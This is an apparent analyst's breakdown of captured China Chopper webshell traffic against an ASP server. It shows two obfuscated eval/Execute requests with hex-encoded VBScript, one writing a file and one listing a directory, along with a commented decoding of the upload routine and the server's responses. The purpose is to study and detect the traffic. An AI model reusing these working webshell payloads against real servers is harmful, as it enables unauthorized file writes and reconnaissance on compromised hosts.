Http://blog.csdn.net/webxscan Dragon
Webxscan=eval ("Execute (" "on+error+resume+next:function+bd%28byval+s%29%3afor+i%3d1+to+len%28s%29+step+2%3ac% 3dmid%28s%2ci%2c2%29%3aif+isnumeric%28mid%28s%2ci%2c1%29%29+then%3aexecute
%28%22%22%22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3aelse%3aexecute%28%22%22 %22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26mid%28s%2ci
%2b2%2c2%29%26%22%22%22%22%29%22%22%22%22%29%3ai%3di%2b2%3aend+if%22%22%26chr%2810%29%26%22%22next%3aend+ Function:Response.Write ("" ""->| "" ""): Execute ("" "" "On+error+resume+next:" "" "%26BD
("" "" "44696d206c2c73732c66662c543a66663d6264287265717565737428227a312229293a73733d5265717565737428227a3222293a6c3d4c656e28 7373293a53657420533d5365727665722e4372656174654f626a656374282241646f
64622e53747265616d22293a5769746820533a2e547970653d313a2e4d6f64653d333a2e4f70656e3a4966205265717565737428227a3322293e30205 468656e3a2e4c6f616446726f6d46696c652022222666662622223a2e506f7369746
96f6e3d2e53697a653a456e642049663a7365742072733d4372656174654f626a656374282241444f44422e5265636f726473657422293a72732e6669 656c64732e617070656e6420226262222c3230352c6c2f323a72732e6f70656e3a72
732e6164646e65773a72732822626222293d73732b636872622830293a72732e7570646174653a2e57726974652072732822626222292e67657463687 56e6b286c2f32293a72732e636c6f73653a5365742072733d4e6f7468696e673a2e5
06f736974696f6e3d303a2e53617665546f46696c652022222666662622222c323a2e436c6f73653a456e6420576974683a53657420533d4e6f746869 6e673a496620457272205468656e3a543d4572722e4465736372697074696f6e3a45
72722e436c6561723a456c73653a543d2231223a456e642049663a526573706f6e73652e5772697465285429 "" ")): Response.Write ( "" "" "|<-" "" "): Response.End" ")"
&z1= 433a5c5c446f63756d656e747320616e642053657474696e67735c5c615c5cd7c0c3e65c5c7777775c5c2e5c5c3132332e747874& Z2=313233343536&z3=0
' Decoded form of the hex blob carried in the request above: the server-side
' file-write routine that the webshell client sends for an "upload" operation.
' Request fields read here:
'   z1 - destination path, hex-encoded (decoded by the bd() helper that the
'        request wrapper defines before this code runs)
'   z2 - file content, sent as hex text (two characters per byte)
'   z3 - numeric flag; a value greater than 0 selects the append branch below
' Result: writes "1" on success, otherwise the VBScript error description. The
' request wrapper frames that output as ->|...|<- and prepends
' "On Error Resume Next", which is why failures surface only via Err at the end.
' Analyst notes: the z1/z2/z3 parameter names, the eval/Execute wrapper around a
' long hex string and the ->| ... |<- response markers are the visible traits of
' this traffic in the capture. The listing was whitespace-mangled when published
' (". Type=1", "ADODB. Recordset "); the code is kept exactly as published.
Dim l,ss,ff,t
FF=BD (Request ("Z1"))
' Z1 = upload path; in this capture it decodes to
' C:\\Documents and Settings\\a\\<Desktop>\\www\\.\\123.txt. The unreadable folder
' name is the double-byte sequence d7 c0 c3 e6 from z1, which is "Desktop" in GBK.
Ss=request ("Z2")
' Z2 = file contents; 313233343536 in this capture, i.e. the text 123456.
L=len (SS)
' L counts hex characters, so L/2 below is the number of bytes to write.
Set s=server.createobject ("ADODB.stream")
With S
' Type=1 is adTypeBinary and Mode=3 is adModeReadWrite: a read/write binary stream.
. Type=1
. Mode=3
. Open
If Request ("Z3") >0 Then
' Answer to the question about the two lines under Z3: when z3 > 0 the existing
' target file is loaded into the stream and the position is moved to its end, so
' the bytes written below are appended after the current content, not over it.
' Presumably the client uses this to send one file in several requests;
' confirm against a capture where z3 > 0 (here z3=0, so the branch is skipped).
. LoadFromFile "" &ff& ""
. position=. Size
End If
' A throwaway one-field recordset converts the z2 text into a binary value that
' Stream.Write accepts. Field type 205 is adLongVarBinary, sized L/2 bytes.
' NOTE(review): the exact text-to-bytes coercion done by ADO is not shown on the
' page; the 6-byte size of 123.txt in the directory listing matches L/2 for
' the 12-character z2 sent here.
Set Rs=createobject ("ADODB. Recordset ")
Rs.fields.append "BB", 205,L/2
Rs.open:rs.addnew:rs ("BB") =SS+CHRB (0)
Rs.update:. Write rs ("BB"). GetChunk (L/2)
Rs.close
Set rs=nothing
' Rewind, then save; option 2 is adSaveCreateOverWrite, so an existing file at
' the target path is replaced by the stream contents.
. Position=0
. SaveToFile "" &ff& "", 2
. Close
End with
Set s=nothing
' Report the outcome: the error text if any step failed, otherwise "1".
If ERR Then
T=err.description
Err.Clear
Else
t= "1"
End If
Response.Write (T)
->|1|<-
Webxscan=eval ("Execute (" "on+error+resume+next:function+bd%28byval+s%29%3afor+i%3d1+to+len%28s%29+step+2%3ac% 3dmid%28s%2ci%2c2%29%3aif+isnumeric%28mid%28s%2ci%2c1%29%29+then%3aexecute
%28%22%22%22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3aelse%3aexecute%28%22%22 %22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26mid%28s%2ci
%2b2%2c2%29%26%22%22%22%22%29%22%22%22%22%29%3ai%3di%2b2%3aend+if%22%22%26chr%2810%29%26%22%22next%3aend+ Function:Response.Write ("" ""->| "" ""): Execute ("" "" "On+error+resume+next:" "" "%26BD
("" "" "44696d2052523a52523d6264285265717565737428227a312229293a46756e6374696f6e204644286474293a46443d596561722864742926222d 223a4966204c656e284d6f6e746828647429293d31205468656e3a4644203d204644
262230223a456e642049663a46443d4644264d6f6e74682864742926222d223a4966204c656e2844617928647429293d31205468656e3a46443d46442 62230223a456e642049663a46443d464426446179286474292622202226466f726d6
1744461746554696d652864742c342926223a223a4966204c656e285365636f6e6428647429293d31205468656e3a46443d4644262230223a456e6420 49663a46443d4644265365636f6e64286474293a456e642046756e6374696f6e3a53
455420433d4372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a65637422293a53657420464f3d432e4765744 66f6c646572282222265252262222293a496620457272205468656e3a526573706f6
e73652e577269746528224552524f523a2f2f2022264572722e4465736372697074696f6e293a4572722e436c6561723a456c73653a466f7220456163 68204620696e20464f2e737562666f6c646572733a526573706f6e73652e57726974
6520462e4e616d6526636872283437292663687228392926464428462e446174654c6173744d6f6469666965642926636872283929266368722834382 92663687228392926432e476574466f6c64657228462e50617468292e61747472696
27574657326636872283130293a4e6578743a466f722045616368204c20696e20464f2e66696c65733a526573706f6e73652e5772697465204c2e4e61 6d6526636872283929264644284c2e446174654c6173744d6f646966696564292663
6872283929264c2e73697a652663687228392926432e47657446696c65284c2e50617468292e6174747269627574657326636872283130293a4e65787 43a456e64204966 "" "): Response.Write (" "" "" "|<-" "" "): Response.End" ")")
&z1=433a5c5c446f63756d656e747320616e642053657474696e67735c5c615c5cd7c0c3e65c5c7777775c5c2e5c5c
->|1121111111/2016-05-06 22:17:08 0 16
bj1/2016-05-06 22:17:09 0 16
css/2016-05-06 22:17:09 0 16
img/2016-05-06 22:17:09 0 16
ip2/2016-05-06 22:17:09 0 16
js/2016-05-06 22:17:09 0 16
thinkphp/2016-05-06 22:17:16 0 16
zz/2016-05-06 22:17:22 0 16
ZZ-Dungeon/2016-05-06 22:17:24 0 16
New Folder/2016-05-06 22:17:25 0 16
. Project 2016-04-05 06:48:00 1143 32
123.txt 2016-05-08 05:47:21 6 32
Asp.asp 2016-04-30 01:08:10 2613 32
Aws.exe 2013-03-22 08:50:42 654164 32
cs.php 2016-04-21 21:02:34 375 32
Eval.asp 2016-05-06 22:13:14 28 32
eval.php 2016-04-06 12:13:02 34 32
Index.html 2016-04-05 06:48:00 123 32
Web.sql 2016-04-10 22:38:32 25050 32
Www.rar 2014-07-16 23:38:40 17318435 32
Zz.rar 2014-07-16 22:49:38 3573855 32
|<-
"Kitchen knife" (China Chopper) ASP file-upload request and response